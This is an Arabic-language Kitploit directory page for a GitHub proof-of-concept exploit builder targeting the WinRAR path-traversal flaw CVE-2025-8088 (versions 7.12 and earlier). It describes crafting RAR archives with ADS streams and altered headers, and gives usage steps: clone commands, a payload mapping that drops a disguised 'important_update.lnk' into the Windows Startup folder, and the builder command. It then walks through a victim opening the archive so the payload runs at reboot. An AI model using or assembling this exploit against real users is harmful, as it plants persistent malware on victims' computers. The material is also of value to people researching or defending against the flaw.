Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8088-WinRAR-builder — استغلال إثبات المفهوم (POC) لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 والإصدارات الأقدم | Kitploit
أدوات/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةتطوير الحمولات
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

استغلال إثبات المفهوم (POC) لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 والإصدارات الأقدم

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8088-WinRAR-builder

استغلال POC لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 والإصدارات الأقدم

🚀 كيف يعمل

  1. ينشئ ملف RAR مدمج مع حمولات أخرى
  2. يستخدم تدفقات ADS متعددة 🔄 - يرفق تدفقات الحمولات بأعماق مختلفة لتجاوز المسارات
  3. يتلاعب برؤوس RAR ⚙️ - يعدّل بنية الأرشيف لاستغلال ثغرة تجاوز المسار
  4. يُسقط الحمولة في مجلد بدء التشغيل 📂 - يحاول كتابة الحمولة إلى مجلد بدء تشغيل Windows عند الاستخراج

🛠️ الاستخدام

  1. استنسخ المستودع
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. جهّز الحمولات
root@kitploit:~
mkdir payloads
  • أضف حمولاتك إلى هذا المجلد (exe, dll, lnk, ...)
  • عدّل PAYLOAD_MAPPING في السكربت
root@kitploit:~
# 2. Map our payload to corresponding destination
#   Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Add your own    
]
  1. شغّل الاستغلال
root@kitploit:~
python builder.py <decoy_file>

🔄 تسلسل التنفيذ

  1. يفتح الضحية ملف RAR باستخدام WinRAR الثغرة (≤7.12)
  2. تُكتب الحمولة إلى المجلد الهدف، على سبيل المثال:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. عند إعادة التشغيل التالية ➡️ تُنفَّذ الحمولة تلقائيًا

📋 المتطلبات

  • نظام تشغيل Windows 🪟
  • Python 3.x 🐍
  • WinRAR مثبّت
تنزيل الأداة